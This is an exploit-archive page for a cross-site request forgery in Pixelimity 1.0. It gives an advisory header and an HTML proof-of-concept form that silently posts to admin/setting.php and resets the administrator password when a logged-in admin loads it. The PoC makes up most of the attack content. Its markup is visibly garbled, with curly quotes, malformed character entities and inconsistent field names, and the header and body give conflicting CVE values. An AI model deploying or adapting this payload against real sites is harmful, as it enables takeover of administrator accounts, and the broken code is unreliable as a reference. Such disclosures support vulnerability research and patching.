Pixelimity 1.0 Cross Site Request Forgery

2021.02.04
Credit: Noth
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery # Date: 2020-06-03 # Exploit Author: Noth # Vendor Homepage: https://github.com/pixelimity/pixelimity # Software Link: https://github.com/pixelimity/pixelimity # Version: v1.0 # CVE : 2020-23522 Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter. PoC : <html> <body> <script>history.pushState(",",'/')</script> <form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php ” method=“POST”> <input type=“hidden” name=“submit&#95;setting” value=“Save&#32;Setting”/> <input type=“hidden” name=“data&#91;admin&#95;portfolio&#95;show&#93;” value=“5”/> <input type=“hidden” name=“data&#91;admin&#95;pages&#95;show&#93;” value=“5”/> <input type=“hidden” name=“admin&#91;data&#95;password&#93;” value=“456789”/> <input type=“hidden” name=“data&#91;site#95;name&#93;" value=“Pixelimity”/> <input type=“hidden” name=“data&#91;site&#95;name&#93;show&#93;” value=“My&#32;Online&#32;Portfolio”/> <input type=“hidden” name=“data&#91;home&#95;image&#95;size&#93” value=“5”/> <input type=“hidden” name=“ data&#91;single&#95;image&#95;image&#95;size#93 ” value=“ 240&44;0&#44;0&44;auto ”/> <input type=“hidden” name=“data&#91;single&#95;image&#95;image&#95;size#93” value=“720&44;0&#44;0&44;auto”/> <input type=“submit” value=“Submit request”/> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top